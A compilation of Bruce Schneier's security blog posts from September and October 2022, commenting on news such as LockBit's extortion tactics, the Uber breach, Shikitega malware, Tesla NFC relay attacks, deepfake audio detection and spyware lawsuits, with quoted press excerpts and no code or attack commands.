<h2>The LockBit Ransomware Gang Is Surprisingly Professional</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/the-lockbit-ransomware-gang-is-surprisingly-professional.html"><strong>[2022.09.07]</strong></a> This <a href="https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/">article</a> makes LockBit sound like a legitimate organization: <blockquote>The DDoS attack last weekend that put a temporary stop to leaking Entrust data was seen as an opportunity to explore the triple extortion tactic to apply more pressure on victims to pay a ransom. LockBitSupp said that the ransomware operator is now looking to add DDoS as an extortion tactic on top of encrypting data and leaking it. “I am looking for dudosers [DDoSers] in the team, most likely now we will attack targets and provide triple extortion, encryption + date leak + dudos, because I have felt the power of dudos and how it invigorates and makes life more interesting,” LockBitSupp wrote in a post on a hacker forum. The gang also promised to share over torrent 300GB of data stolen from Entrust so “the whole world will know your secrets.” LockBit’s spokesperson said that they would share the Entrust data leak privately with anyone that contacts them before making it available over torrent.</blockquote> They’re expanding: locking people out of their data, publishing it if the victim doesn’t pay, and DDoSing their network as an additional incentive.

<h2>Facebook Has No Idea What Data It Has</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/facebook-has-no-idea-what-data-it-has.html"><strong>[2022.09.08]</strong></a> This is from a <a href="https://theintercept.com/2022/09/07/facebook-personal-data-no-accountability/">court deposition</a>: <blockquote>Facebook’s stonewalling has been revealing on its own, providing variations on the same theme: It has amassed so much data on so many billions of people and organized it so confusingly that full transparency is impossible on a technical level. In the March 2022 hearing, Zarashaw and Steven Elia, a software engineering manager, described Facebook as a data-processing apparatus so complex that it defies understanding from within. The hearing amounted to two high-ranking engineers at one of the most powerful and resource-flush engineering outfits in history describing their product as an unknowable machine. The special master at times seemed in disbelief, as when he questioned the engineers over whether any documentation existed for a particular Facebook subsystem. “Someone must have a diagram that says this is where this data is stored,” he said, according to the transcript. Zarashaw responded: “We have a somewhat strange engineering culture compared to most where we don’t generate a lot of artifacts during the engineering process. Effectively the code is its own design document often.” He quickly added, “For what it’s worth, this is terrifying to me when I first joined as well.” […] Facebook’s inability to comprehend its own functioning took the hearing up to the edge of the metaphysical. At one point, the court-appointed special master noted that the “Download Your Information” file provided to the suit’s plaintiffs must not have included everything the company had stored on those individuals because it appears to have no idea what it truly stores on anyone. Can it be that Facebook’s designated tool for comprehensively downloading your information might not actually download all your information? This, again, is outside the boundaries of knowledge. “The solution to this is unfortunately exactly the work that was done to create the DYI file itself,” noted Zarashaw. “And the thing I struggle with here is in order to find gaps in what may not be in DYI file, you would by definition need to do even more work than was done to generate the DYI files in the first place.” The systemic fogginess of Facebook’s data storage made answering even the most basic question futile. At another point, the special master asked how one could find out which systems actually contain user data that was created through machine inference. “I don’t know,” answered Zarashaw. “It’s a rather difficult conundrum.”</blockquote> I’m not surprised. These systems are so complex that no humans understand them anymore. That allows us to do things we couldn’t do otherwise, but it’s also a problem. EDITED TO ADD: Another <a href="https://www.vice.com/en/article/qjk3wb/facebook-engineers-admit-they-dont-know-what-they-do-with-your-data">article</a>.

<h2>Responsible Disclosure for Cryptocurrency Security</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/responsible-disclosure-for-cryptocurrency-security.html"><strong>[2022.09.09]</strong></a> Stewart Baker <a href="https://www.lawfareblog.com/rethinking-responsible-disclosure-cryptocurrency-security">discusses</a> why the industry-norm responsible disclosure for software vulnerabilities fails for cryptocurrency software. <blockquote>Why can’t the cryptocurrency industry solve the problem the way the software and hardware industries do, by patching and updating security as flaws are found? Two reasons: First, many customers don’t have an ongoing relationship with the hardware and software providers that protect their funds­—nor do they have an incentive to update security on a regular basis. Turning to a new security provider or using updated software creates risks; leaving everything the way it was feels safer. So users won’t be rushing to pay for and install new security patches. Second, cryptocurrency is famously and deliberately decentralized, anonymized, and low friction. That means that the company responsible for hardware or software security may have no way to identify who used its product, or to get the patch to those users. It also means that many wallets with security flaws will be publicly accessible, protected only by an elaborate password. Once word of the flaw leaks, the password can be reverse engineered by anyone, and the legitimate owners are likely to find themselves in a race to move their assets before the thieves do. Even in the software industry, hackers routinely reverse engineer Microsoft’s patches to find the security flaws they fix and then try to exploit them before the patches have been fully installed.</blockquote> He doesn’t have any good ideas to fix this. I don’t either. Just add it to the pile of blockchain’s <a href="https://www.schneier.com/blog/archives/2019/02/blockchain_and_.html">many problems</a>.

<h2>New Linux Cryptomining Malware</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/new-linux-cryptomining-malware.html"><strong>[2022.09.12]</strong></a> It’s <a href="https://www.theregister.com/2022/09/10/in_brief_security/">pretty nasty</a>: <blockquote>The malware was dubbed “<a href="https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux">Shikitega</a>” for its extensive use of the popular Shikata Ga Nai polymorphic encoder, which allows the malware to “mutate” its code to avoid detection. Shikitega alters its code each time it runs through one of several decoding loops that AT&T said each deliver multiple attacks, beginning with an ELF file that’s just 370 bytes. Shikitega also downloads Mettle, a Metasploit interpreter that gives the attacker the ability to control attached webcams and includes a sniffer, multiple reverse shells, process control, shell command execution and additional abilities to control the affected system. […] The final stage also establishes persistence, which Shikitega does by downloading and executing five shell scripts that configure a pair of cron jobs for the current user and a pair for the root user using crontab, which it can also install if not available. Shikitega also uses cloud hosting solutions to store parts of its payload, which it further uses to obfuscate itself by contacting via IP address instead of domain name. “Without [a] domain name, it’s difficult to provide a complete list of indicators for detections since they are volatile and they will be used for legitimate purposes in a short period of time,” AT&T said. Bottom line: Shikitega is a nasty piece of code. AT&T recommends Linux endpoint and IoT device managers keep security patches installed, keep EDR software up to date and make regular backups of essential systems.</blockquote> Another <a href="https://arstechnica.com/information-technology/2022/09/new-linux-malware-combines-unusual-stealth-with-a-full-suite-of-capabilities/">article</a>. Slashdot <a href="https://it.slashdot.org/story/22/09/11/0314234/powerful-new-linux-malware-shikitega-uses-unusual-multi-stage-stealth">thread</a>.

<h2>FBI Seizes Stolen Cryptocurrencies</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/fbi-seizes-stolen-cryptocurrencies.html"><strong>[2022.09.13]</strong></a> The <i>Wall Street Journal</i> is <a href="https://www.wsj.com/articles/u-s-recovers-over-30-million-in-cryptocurrency-stolen-by-north-korean-hackers-11662648600">reporting</a> that the FBI has recovered over $30 million in cryptocurrency stolen by North Korean hackers earlier this year. It’s only a fraction of the $540 million stolen, but it’s something. <blockquote>The Axie Infinity recovery represents a shift in law enforcement’s ability to trace funds through a web of so-called crypto addresses, the virtual accounts where cryptocurrencies are stored. These addresses can be created quickly without them being linked to a cryptocurrency company that could freeze the funds. In its effort to mask the stolen crypto, Lazarus Group used more than 12,000 different addresses, according to Chainalysis. Unlike bank transactions that happen through private networks, movement between crypto accounts is visible to the world on the blockchain. Advanced blockchain-monitoring tools and cooperation from centralized crypto exchanges enabled the FBI to trace the crypto to where Lazarus Group tried to cash out, investigators said.</blockquote> The money was laundered through the Tornado Cash mixer.

<h2>Weird Fallout from Peiter Zatko's Twitter Whistleblowing</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/weird-fallout-from-peiter-zatkos-twitter-whistleblowing.html"><strong>[2022.09.14]</strong></a> People are trying to <a href="https://www.newyorker.com/news/news-desk/the-search-for-dirt-on-the-twitter-whistle-blower">dig up dirt</a> on Peiter Zatko, better known as Mudge. For the record, I have not been contacted. I’m not sure if I should feel slighted.

<h2>Upcoming Speaking Engagements</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/upcoming-speaking-engagements-23.html"><strong>[2022.09.14]</strong></a> This is a current list of where and when I am scheduled to speak: <ul> <li>I’m speaking as part of a Geneva Centre for Security Policy course on <a href="https://www.gcsp.ch/courses/cyber-security-context-international-security">Cyber Security in the Context of International Security</a>, online, on September 22, 2022.</li> <li>I’m speaking at <a href="https://www.avantec.ch/inside/">IT-Security INSIDE 2022</a> in Zurich, Switzerland, on September 22, 2022.</li> </ul> The list is maintained on <a href="https://www.schneier.com/events/">this page</a>.

<h2>Relay Attack against Teslas</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/relay-attack-against-teslas.html"><strong>[2022.09.15]</strong></a> Nice <a href="https://jalopnik.com/teslas-hackers-have-found-another-unauthorized-access-v-1849535920">work</a>: <blockquote>Radio relay attacks are technically complicated to execute, but conceptually easy to understand: attackers simply extend the range of your existing key using what is essentially a high-tech walkie-talkie. One thief stands near you while you’re in the grocery store, intercepting your key’s transmitted signal with a radio transceiver. Another stands near your car, with another transceiver, taking the signal from their friend and passing it on to the car. Since the car and the key can now talk, through the thieves’ range extenders, the car has no reason to suspect the key isn’t inside—and fires right up. But Tesla’s credit card keys, like <a href="https://www.nfcw.com/nfc-world/nfc-digital-car-keys-go-live-for-android-users/">many digital keys stored in cell phones</a>, don’t work via radio. Instead, they rely on a different protocol called Near Field Communication or NFC. Those keys had previously been seen as more secure, since <a href="https://www.mouser.com/applications/rfid-nfc-introduction/">their range is so limited</a> and their handshakes with cars are more complex. Now, researchers <a href="https://act-on.ioactive.com/acton/attachment/34793/f-6460b49e-1afe-41c3-8f73-17dc14916847/1/-/-/-/-/NFC-relay-TESlA_JRoriguez.pdf">seem to have cracked the code</a>. By reverse-engineering the communications between a Tesla Model Y and its credit card key, they were able to properly execute a range-extending relay attack against the crossover. While this specific use case focuses on Tesla, it’s a proof of concept—NFC handshakes can, and eventually will, be reverse-engineered.</blockquote>

<h2>Massive Data Breach at Uber</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/massive-data-breach-at-uber.html"><strong>[2022.09.16]</strong></a> It’s <a href="https://www.nytimes.com/2022/09/15/technology/uber-hacking-breach.html">big</a>: <blockquote>The breach appeared to have compromised many of Uber’s internal systems, and a person claiming responsibility for the hack sent images of email, cloud storage and code repositories to cybersecurity researchers and The New York Times. “They pretty much have full access to Uber,” said Sam Curry, a security engineer at Yuga Labs who corresponded with the person who claimed to be responsible for the breach. “This is a total compromise, from what it looks like.”</blockquote> It looks like a pretty basic phishing attack; someone gave the hacker their login credentials. And because Uber has lousy internal security, lots of people have access to everything. So once a hacker gains a foothold, they have access to everything. This is the same thing that Mudge <a href="https://www.hawley.senate.gov/twitter-whistleblower-engineers-have-access-personal-user-data-can-tweet-anybody">accuses Twitter of</a>: too many employees have broad access within the company’s network. More <a href="https://www.bleepingcomputer.com/news/security/uber-hacked-internal-systems-breached-and-vulnerability-reports-stolen/">details</a>. Slashdot <a href="https://it.slashdot.org/story/22/09/16/090235/uber-investigating-breach-of-its-computer-systems">thread</a>. EDITED TO ADD (9/20): More <a href="https://www.darkreading.com/attacks-breaches/uber-breach-external-contractor-mfa-bombing-attack">details</a>.

<h2>Large-Scale Collection of Cell Phone Data at US Borders</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/large-scale-collection-of-cell-phone-data-at-us-borders.html"><strong>[2022.09.19]</strong></a> The <i>Washington Post</i> is <a href="https://www.washingtonpost.com/technology/2022/09/15/government-surveillance-database-dhs/">reporting</a> that the US Customs and Border Protection agency is seizing and copying cell phone, tablet, and computer data from “as many as” 10,000 phones per year, including an unspecified number of American citizens. This is done without a warrant, because “…courts have long granted an exception to border authorities, allowing them to search people’s devices without a warrant or suspicion of a crime.” <blockquote>CBP’s inspection of people’s phones, laptops, tablets and other electronic devices as they enter the country has long been a controversial practice that the agency has defended as a low-impact way to pursue possible security threats and determine an individual’s “intentions upon entry” into the U.S. But the revelation that thousands of agents have access to a searchable database without public oversight is a new development in what privacy advocates and some lawmakers warn could be an infringement of Americans’ Fourth Amendment rights against unreasonable searches and seizures. […] CBP conducted roughly 37,000 searches of travelers’ devices in the 12 months ending in October 2021, according to <a href="https://www.cbp.gov/newsroom/stats/cbp-enforcement-statistics">agency data</a>, and more than 179 million people traveled that year through U.S. ports of entry. </blockquote> <a href="https://gizmodo.com/border-patrol-surveillance-cell-data-no-warrants-1849540504">More</a> <a href="https://politicalwire.com/2022/09/15/customs-officials-have-copied-americans-phone-data/">articles</a>. Slashdot <a href="https://yro.slashdot.org/story/22/09/15/2018208/customs-officials-have-copied-americans-phone-data-at-massive-scale">thread</a>.

<h2>Credit Card Fraud That Bypasses 2FA</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/credit-card-fraud-that-bypasses-2fa.html"><strong>[2022.09.20]</strong></a> Someone in the UK is stealing <a href="https://www.bbc.com/news/uk-england-london-62809151">smartphones and credit cards</a> from people who have stored them in gym lockers, and is using the two items in combination to commit fraud: <blockquote>Phones, of course, can be made inaccessible with the use of passwords and face or fingerprint unlocking. And bank cards can be stopped. But the thief has a method which circumnavigates those basic safety protocols. Once they have the phone and the card, they register the card on the relevant bank’s app on their own phone or computer. Since it is the first time that card will have been used on the new device, a one-off security passcode is demanded. That verification passcode is sent by the bank to the stolen phone. The code flashes up on the locked screen of the stolen phone, leaving the thief to tap it into their own device. Once accepted, they have control of the bank account. They can transfer money or buy goods, or change access to the account.</blockquote>

<h2>Automatic Cheating Detection in Human Racing</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/automatic-cheating-detection-in-human-racing.html"><strong>[2022.09.21]</strong></a> This is a <a href="https://joeposnanski.substack.com/p/checkmate">fascinating glimpse</a> of the future of automatic cheating detection in sports: <blockquote>Maybe you heard about the truly insane false-start controversy in track and field? Devon Allen—a wide receiver for the Philadelphia Eagles—was disqualified from the 110-meter hurdles at the World Athletics Championships a few weeks ago for a false start. Here’s the problem: You can’t see the false start. Nobody can see the false start. By sight, Allen most definitely does not leave before the gun. But here’s the thing: World Athletics has determined that it is not possible for someone to push off the block within a tenth of a second of the gun without false starting. They have science that shows it is beyond human capabilities to react that fast. Of course there are those (I’m among them) who would tell you that’s nonsense, that’s pseudoscience, there’s no way that they can limit human capabilities like that. There is science that shows it is humanly impossible to hit a fastball. There was once science that showed human beings could not run a four-minute mile. Besides, do you know what Devon Allen’s reaction time was? It was 0.99 seconds. One thousandth of a second too fast, according to World Athletics’ science. They’re THAT sure that .01 seconds—and EXACTLY .01 seconds—is the limit of human possibilities that they will disqualify an athlete who has trained his whole life for this moment because he reacted one thousandth of a second faster than they think possible?</blockquote> We in the computer world are used to this sort of thing. “The computer is always right,” even when it’s obviously wrong. But now computers are leaving the world of keyboards and screens, and this sort of thing will become more pervasive. In sports, computer systems are used to detect when a ball is out of bounds in tennis and other games and when a pitch is a strike in baseball. I’m sure there’s more—are computers detecting first downs in football?—but I’m not enough of a sports person to know them.

<h2>Prompt Injection/Extraction Attacks against AI Systems</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/prompt-injection-extraction-attacks-against-ai-systems.html"><strong>[2022.09.22]</strong></a> This is <a href="https://simonwillison.net/2022/Sep/12/prompt-injection/">an</a> <a href="https://simonwillison.net/2022/Sep/16/prompt-injection-solutions/">interesting</a> <a href="https://simonwillison.net/2022/Sep/17/prompt-injection-more-ai/">attack</a> I had not previously considered. The variants <a href="https://mobile.twitter.com/mkualquiera/status/1570546998104948736">are</a> <a href="https://mobile.twitter.com/mkualquiera/status/1570840288188592129">interesting</a>, and I think we’re just starting to understand their implications.

<h2>Leaking Screen Information on Zoom Calls through Reflections in Eyeglasses</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/leaking-screen-information-on-zoom-calls-through-reflections-in-eyeglasses.html"><strong>[2022.09.23]</strong></a> Okay, it’s an obscure threat. But people are <a href="https://www.theregister.com/2022/09/17/glasses_reflections_zoom/">researching it</a>: <blockquote>Our models and experimental results in a controlled lab setting show it is possible to reconstruct and recognize with over 75 percent accuracy on-screen texts that have heights as small as 10 mm with a 720p webcam.” That corresponds to 28 pt, a font size commonly used for headings and small headlines. […] Being able to read reflected headline-size text isn’t quite the privacy and security problem of being able to read smaller 9 to 12 pt fonts. But this technique is expected to provide access to smaller font sizes as high-resolution webcams become more common. “We found future 4k cameras will be able to peek at most header texts on almost all websites and some text documents,” said Long. […] A variety of factors can affect the legibility of text reflected in a video conference participant’s glasses. These include reflectance based on the meeting participant’s skin color, environmental light intensity, screen brightness, the contrast of the text with the webpage or application background, and the characteristics of eyeglass lenses. Consequently, not every glasses-wearing person will necessarily provide adversaries with reflected screen sharing. With regard to potential mitigations, the boffins say that Zoom already provides a video filter in its Background and Effects settings menu that consists of reflection-blocking opaque cartoon glasses. Skype and Google Meet lack that defense.</blockquote> Research <a href="https://arxiv.org/abs/2205.03971">paper</a>.

<h2>Leaking Passwords through the Spellchecker</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/leaking-passwords-through-the-spellchecker.html"><strong>[2022.09.26]</strong></a> Sometimes browser spellcheckers <a href="https://www.bleepingcomputer.com/news/security/google-microsoft-can-get-your-passwords-via-web-browsers-spellcheck/">leak passwords</a>: <blockquote>When using major web browsers like Chrome and Edge, your form data is transmitted to Google and Microsoft, respectively, should enhanced spellcheck features be enabled. Depending on the website you visit, the form data may itself include PII­—including but not limited to Social Security Numbers (SSNs)/Social Insurance Numbers (SINs), name, address, email, date of birth (DOB), contact information, bank and payment information, and so on.</blockquote> The solution is to only use the spellchecker options that keep the data on your computer—and don’t send it into the cloud.

<h2>New Report on IoT Security</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/new-report-on-iot-security.html"><strong>[2022.09.27]</strong></a> The Atlantic Council has published a <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/security-in-the-billions/">report</a> on securing the Internet of Things: “Security in the Billions: Toward a Multinational Strategy to Better Secure the IoT Ecosystem.” The report examines the regulatory approaches taken by four countries—the US, the UK, Australia, and Singapore—to secure home, medical, and networking/telecommunications devices. The report recommends that regulators should 1) enforce minimum security standards for manufacturers of IoT devices, 2) incentivize higher levels of security through public contracting, and 3) try to align IoT standards internationally (for example, international guidance on handling connected devices that stop receiving security updates). <blockquote>This report looks to existing security initiatives as much as possible—both to leverage existing work and to avoid counterproductively suggesting an entirely new approach to IoT security—while recommending changes and introducing more cohesion and coordination to regulatory approaches to IoT cybersecurity. It walks through the current state of risk in the ecosystem, analyzes challenges with the current policy model, and describes a synthesized IoT security framework. The report then lays out nine recommendations for government and industry actors to enhance IoT security, broken into three recommendation sets: setting a baseline of minimally acceptable security (or “Tier 1”), incentivizing above the baseline (or “Tier 2” and above), and pursuing international alignment on standards and implementation across the entire IoT product lifecycle (from design to sunsetting). It also includes implementation guidance for the United States, Australia, UK, and Singapore, providing a clearer roadmap for countries to operationalize the recommendations in their specific jurisdictions—and push towards a stronger, more cohesive multinational approach to securing the IoT worldwide.</blockquote> Note: One of the authors of this report was a student of mine at Harvard Kennedy School, and did this work with the Atlantic Council under my supervision.

<h2>Cold War Bugging of Soviet Facilities</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/cold-war-bugging-of-soviet-facilities.html"><strong>[2022.09.28]</strong></a> Found documents in Poland <a href="https://thebrushpass.projectbrazen.com/coldwarbuggingsovietunion/">detail</a> US spying operations against the former Soviet Union. <blockquote>The file details a number of bugs found at Soviet diplomatic facilities in Washington, D.C., New York, and San Francisco, as well as in a Russian government-owned vacation compound, apartments used by Russia personnel, and even Russian diplomats’ cars. And the bugs were <i>everywhere</i>: encased in plaster in an apartment closet; behind electrical and television outlets; bored into concrete bricks and threaded into window frames; inside wooden beams and baseboards and stashed within a building’s foundation itself; surreptitiously attached to security cameras; wired into ceiling panels and walls; and secretly implanted into the backseat of cars and in their window panels, instrument panels, and dashboards. It’s an impressive—­ and impressively thorough—­ effort by U.S. counterspies.</blockquote> We have long read about sophisticated Russian spying operations—bugging the <a href="https://irp.fas.org/news/2001/03/moscowbugs.html">Moscow embassy</a>, bugging <a href="https://www.cryptomuseum.com/covert/bugs/selectric/">Selectric typewriters</a> in the Moscow embassy, bugging the <a href="https://www.airforcemag.com/PDF/MagazineArchive/Documents/2012/September%202012/0912embassy.pdf">new Moscow embassy</a>. These are the first details I’ve read about the US bugging the Russians’ embassy.

<h2>Differences in App Security/Privacy Based on Country</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/differences-in-app-security-privacy-based-on-country.html"><strong>[2022.09.29]</strong></a> Depending on where you are when you download your Android apps, it might collect <a href="https://theconversation.com/the-same-app-can-pose-a-bigger-security-and-privacy-threat-depending-on-the-country-where-you-download-it-study-finds-189099">more or less data</a> about you. <blockquote>The apps we downloaded from Google Play also showed differences based on country in their security and privacy capabilities. One hundred twenty-seven apps varied in what the apps were allowed to access on users’ mobile phones, 49 of which had additional permissions deemed “dangerous” by Google. Apps in Bahrain, Tunisia and Canada requested the most additional dangerous permissions. Three VPN apps enable clear text communication in some countries, which allows unauthorized access to users’ communications. One hundred and eighteen apps varied in the number of ad trackers included in an app in some countries, with the categories Games, Entertainment and Social, with Iran and Ukraine having the most increases in the number of ad trackers compared to the baseline number common to all countries. One hundred and three apps have differences based on country in their privacy policies. Users in countries not covered by data protection regulations, such as GDPR in the EU and the California Consumer Privacy Act in the U.S., are at higher privacy risk. For instance, 71 apps available from Google Play have clauses to comply with GDPR only in the EU and CCPA only in the U.S. Twenty-eight apps that use dangerous permissions make no mention of it, despite <a href="https://support.google.com/googleplay/android-developer/answer/10144311?visit_id=637995492293465522-1318183419&rd=1">Google’s policy</a> requiring them to do so.</blockquote> Research paper: “<a href="https://www.usenix.org/conference/usenixsecurity22/presentation/kumar">A Large-scale Investigation into Geodifferences in Mobile Apps</a>“: <blockquote><b>Abstract</b>: Recent studies on the web ecosystem have been raising alarms on the increasing geodifferences in access to Internet content and services due to Internet censorship and geoblocking. However, geodifferences in the mobile app ecosystem have received limited attention, even though apps are central to how mobile users communicate and consume Internet content. We present the first large-scale measurement study of geodifferences in the mobile app ecosystem. We design a semi-automatic, parallel measurement testbed that we use to collect 5,684 popular apps from Google Play in 26 countries. In all, we collected 117,233 apk files and 112,607 privacy policies for those apps. Our results show high amounts of geoblocking with 3,672 apps geoblocked in at least one of our countries. While our data corroborates anecdotal evidence of takedowns due to government requests, unlike common perception, we find that blocking by developers is significantly higher than takedowns in all our countries, and has the most influence on geoblocking in the mobile app ecosystem. We also find instances of developers releasing different app versions to different countries, some with weaker security settings or privacy disclosures that expose users to higher security and privacy risks. We provide recommendations for app market proprietors to address the issues discovered.</blockquote>

<h2>Security Vulnerabilities in Covert CIA Websites</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/security-vulnerabilities-in-covert-cia-websites.html"><strong>[2022.09.30]</strong></a> Back in 2018, we learned that covert system of websites that the CIA used for communications was <a href="https://news.yahoo.com/cias-communications-suffered-catastrophic-compromise-started-iran-090018710.html/">compromised by</a>—at least—China and Iran, and that the blunder caused a bunch of arrests, imprisonments, and executions. We’re <a href="https://www.reuters.com/investigates/special-report/usa-spies-iran/">now learning</a> that the CIA is still “using an irresponsibly secured system for asset communication.” Citizen Lab did the <a href="https://citizenlab.ca/2022/09/statement-on-the-fatal-flaws-found-in-a-defunct-cia-covert-communications-system/">research</a>: <blockquote>Using only a single website, as well as publicly available material such as historical internet scanning results and the Internet Archive’s Wayback Machine, we identified a network of 885 websites and have high confidence that the United States (US) Central Intelligence Agency (CIA) used these sites for covert communication. The websites included similar Java, JavaScript, Adobe Flash, and CGI artifacts that implemented or apparently loaded covert communications apps. In addition, blocks of sequential IP addresses registered to apparently fictitious US companies were used to host some of the websites. All of these flaws would have facilitated discovery by hostile parties. […] The bulk of the websites that we discovered were active at various periods between 2004 and 2013. We do not believe that the CIA has recently used this communications infrastructure. Nevertheless, a subset of the websites are linked to individuals who may be former and possibly still active intelligence community employees or assets: <ul><li>Several are currently abroad <li>Another left mainland China in the timeframe of the Chinese crackdown <li>Another was subsequently employed by the US State Department <li>Another now works at a foreign intelligence contractor</ul></blockquote> Citizen Lab is not publishing details, of course. When I was a kid, I thought a lot about being a spy. And this, right here, was the one thing I worried about. It didn’t matter how clever and resourceful I was. If my handlers were incompetent, I was dead. Another <a href="https://www.theguardian.com/us-news/2022/sep/29/cia-websites-security-sources-communication-safety">news article</a>. EDITED TO ADD (10/2): Shashdot <a href="https://it.slashdot.org/story/22/10/01/204219/covert-cia-websites-could-have-been-found-by-an-amateur-research-finds">thread</a>.

<h2>Detecting Deepfake Audio by Modeling the Human Acoustic Tract</h2>

<a href="https://www.schneier.com/blog/archives/2022/10/detecting-deepfake-audio-by-modeling-the-human-acoustic-tract.html"><strong>[2022.10.03]</strong></a> This is <a href="https://www.usenix.org/conference/usenixsecurity22/presentation/blue">interesting research</a>: <blockquote>In this paper, we develop a new mechanism for detecting audio deepfakes using techniques from the field of articulatory phonetics. Specifically, we apply fluid dynamics to estimate the arrangement of the human vocal tract during speech generation and show that deepfakes often model impossible or highly-unlikely anatomical arrangements. When parameterized to achieve 99.9% precision, our detection mechanism achieves a recall of 99.5%, correctly identifying all but one deepfake sample in our dataset.</blockquote> From an <a href="https://theconversation.com/deepfake-audio-has-a-tell-researchers-use-fluid-dynamics-to-spot-artificial-imposter-voices-189104">article</a> by two of the researchers: <blockquote>The first step in differentiating speech produced by humans from speech generated by deepfakes is understanding how to acoustically model the vocal tract. Luckily scientists have techniques to estimate what someone—or some being such as a <a href="https://carnegiemnh.org/what-did-dinosaurs-sound-like-paleoacoustics/">dinosaur</a>—would sound like based on anatomical measurements of its vocal tract. We did the reverse. By inverting many of these same techniques, we were able to extract an approximation of a speaker’s vocal tract during a segment of speech. This allowed us to effectively peer into the anatomy of the speaker who created the audio sample. From here, we hypothesized that deepfake audio samples would fail to be constrained by the same anatomical limitations humans have. In other words, the analysis of deepfaked audio samples simulated vocal tract shapes that do not exist in people. Our testing results not only confirmed our hypothesis but revealed something interesting. When extracting vocal tract estimations from deepfake audio, we found that the estimations were often comically incorrect. For instance, it was common for deepfake audio to result in vocal tracts with the same relative diameter and consistency as a drinking straw, in contrast to human vocal tracts, which are much wider and more variable in shape.</blockquote> This is, of course, not the last word. Deepfake generators will figure out how to use these techniques to create harder-to-detect fake voices. And the deepfake detectors will figure out another, better, detection technique. And the arms race will continue. Slashdot <a href="https://slashdot.org/story/22/10/01/0048226/researchers-use-fluid-dynamics-to-spot-artificial-imposter-voices">thread</a>.

<h2>NSA Employee Charged with Espionage</h2>

<a href="https://www.schneier.com/blog/archives/2022/10/nsa-employee-charged-with-espionage.html"><strong>[2022.10.04]</strong></a> An ex-NSA employee <a href="https://www.nytimes.com/2022/09/30/us/nsa-espionage-colorado.html">has</a> <a href="https://www.cnn.com/2022/09/29/politics/jareh-sebastian-dalke-nsa-espionage-sell-secrets-charged/index.html">been</a> <a href="https://www.nextgov.com/technology-news/2022/09/nsa-employee-leaked-classified-cyber-intel-charged-espionage/377846/">charged</a> <a href="https://www.cyberscoop.com/nsa-former-employee-espionage/">with</a> trying to sell classified data to the Russians (but instead actually talking to an undercover FBI agent). It’s a weird story, and the FBI <a href="https://www.documentcloud.org/documents/23113211-dalke_affidavit_0">affidavit</a> raises more questions than it answers. The employee only worked for the NSA for three weeks—which is weird in itself. I can’t figure out how he linked up with the undercover FBI agent. It’s not clear how much of this was the employee’s idea, and whether he was goaded by the FBI agent. Still, hooray for not leaking NSA secrets to the Russians. (And, almost ten years after Snowden, do we still have this much trouble vetting people before giving them security clearances?) <blockquote>Mr. Dalke, who had already left the N.S.A. but told the agent that he still worked there on a temporary assignment, then revealed that had taken “highly sensitive information” related to foreign targeting of U.S. systems and information on cyber operations, the prosecutors said. He offered the information in exchange for cryptocurrency and said he was in “financial need.” Court records show he had nearly $84,000 in debt between student loans and credit cards.</blockquote> EDITED TO ADD (10/5): Marcy Wheeler <a href="https://www.emptywheel.net/2022/09/30/fbi-seems-to-be-collecting-offers-to-spy-for-russia/">notes</a> that the FBI seems to be sitting on some common recruitment point, and collecting potential Russian spies.

<h2>October Is Cybersecurity Awareness Month</h2>

<a href="https://www.schneier.com/blog/archives/2022/10/october-is-cybersecurity-awareness-month.html"><strong>[2022.10.05]</strong></a> For the past nineteen years, October has been Cybersecurity Awareness Month here in the US, and that event that has always been part advice and part ridicule. I tend to fall on the apathy end of the spectrum; I don’t think I’ve ever mentioned it before. But the memes can be funny. Here’s a <a href="https://www.washingtonpost.com/politics/2022/10/04/dread-sincerity-comedy-cybersecurity-awareness-month/">decent</a> rundown of some of the chatter.

<h2>Spyware Maker Intellexa Sued by Journalist</h2>

<a href="https://www.schneier.com/blog/archives/2022/10/spyware-maker-intellexa-sued-by-journalist.html"><strong>[2022.10.07]</strong></a> The Greek journalist Thanasis Koukakis was spied on by his own government, with a commercial spyware product called “Predator.” That product is sold by a company in North Macedonia called Cytrox, which is in turn owned by an Israeli company called Intellexa. Koukakis is <a href="https://gizmodo.com/thanasis-koukakis-sues-intellexa-over-predator-spyware-1849625793">suing Intellexa</a>. <blockquote>The lawsuit filed by Koukakis takes aim at Intellexa and its executive, alleging a criminal breach of privacy and communication laws, reports <a href="https://www.haaretz.com/world-news/europe/2022-10-06/ty-article/.premium/criminal-allegations-against-israeli-linked-spyware-ex-intel-commander-in-hacking-scandal/00000183-ad14-d3f8-a9ef-bf5752e60000">Haaretz</a>. The founder of Intellexa, a former Israeli intelligence commander named Taj Dilian, is listed as one of the defendants in the suit, as is another shareholder, Sara Hemo, and the firm itself. The objective of the suit, Koukakis says, is to spur an investigation to determine whether a criminal indictment should be brought against the defendants.</blockquote> Why does it always seem to be Israel? The world would be a much safer place if that government stopped this cyberweapons arms trade from inside its borders.